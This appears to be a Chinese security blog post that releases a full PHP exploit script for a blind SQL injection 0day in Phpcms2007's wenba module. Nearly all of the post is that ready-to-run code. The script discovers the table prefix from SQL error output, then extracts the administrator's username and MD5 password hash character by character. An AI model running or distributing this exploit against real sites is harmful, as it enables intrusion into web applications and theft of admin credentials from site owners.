PhpCms2007 sp6 SQL injection 0day (wenba) 's

作者：oldjun

早前在phpcms 0day频发的时候写的这个exp，藏着这个exp藏了一个多月吧，也没有拿它去打站，一直丢在我硬盘里，今天看到11期的黑防公布了，于是我也丢出来吧：

<? print_r(' -------------------------------------------------------------------------------- Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit BY oldjun[S.U.S](http://www.oldjun.com) -------------------------------------------------------------------------------- '); if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; }  function sendpacketii($packet) { global  $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo 'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); }  $host=$argv[1]; $path=$argv[2]; $prefix="phpcms_"; $cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";  if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo "Error... check the path!/r/n/r/n"; die;}  /*get   $prefix*/ $packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0/r/n"; $packet.="Host: ".$host."/r/n"; $packet.="Cookie: ".$cookie."/r/n"; $packet.="Connection: Close/r/n/r/n"; sendpacketii($packet); //echo $html; if (eregi("in your SQL syntax",$html)) { $temp=explode("FROM ",$html); if(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);} if($temp2[0]) $prefix=$temp2[0]; echo "[+]prefix -> ".$prefix."/r/n"; } echo "[~]exploting now,plz waiting.../r/n/r/n";  $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0/r/n"; $packet.="Host: ".$host."/r/n"; $packet.="Connection: Close/r/n/r/n"; sendpacketii($packet); if (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!/r/n/r/n"; die;}  $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $chars=array_merge($chars,range(97,102));//a-f letters $j=1;$password=""; while (!strstr($password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0/r/n"; $packet.="Host: ".$host."/r/n"; $packet.="Connection: Close/r/n/r/n"; sendpacketii($packet); if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."/r/n";break;} } if ($i==255) {die("Exploit failed...");} } $j++; }  $j=1;$username=""; while (!strstr($username,chr(0))) { for ($i=0; $i<=255; $i++) { $packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0/r/n"; $packet.="Host: ".$host."/r/n"; $packet.="Connection: Close/r/n/r/n"; sendpacketii($packet); if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."/r/n";break;} if ($i==255) {die("Exploit failed...");} } $j++; } print_r(' -------------------------------------------------------------------------------- [+]username -> '.$username.' [+]password(md5 32λ) -> '.$password.' -------------------------------------------------------------------------------- '); function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?>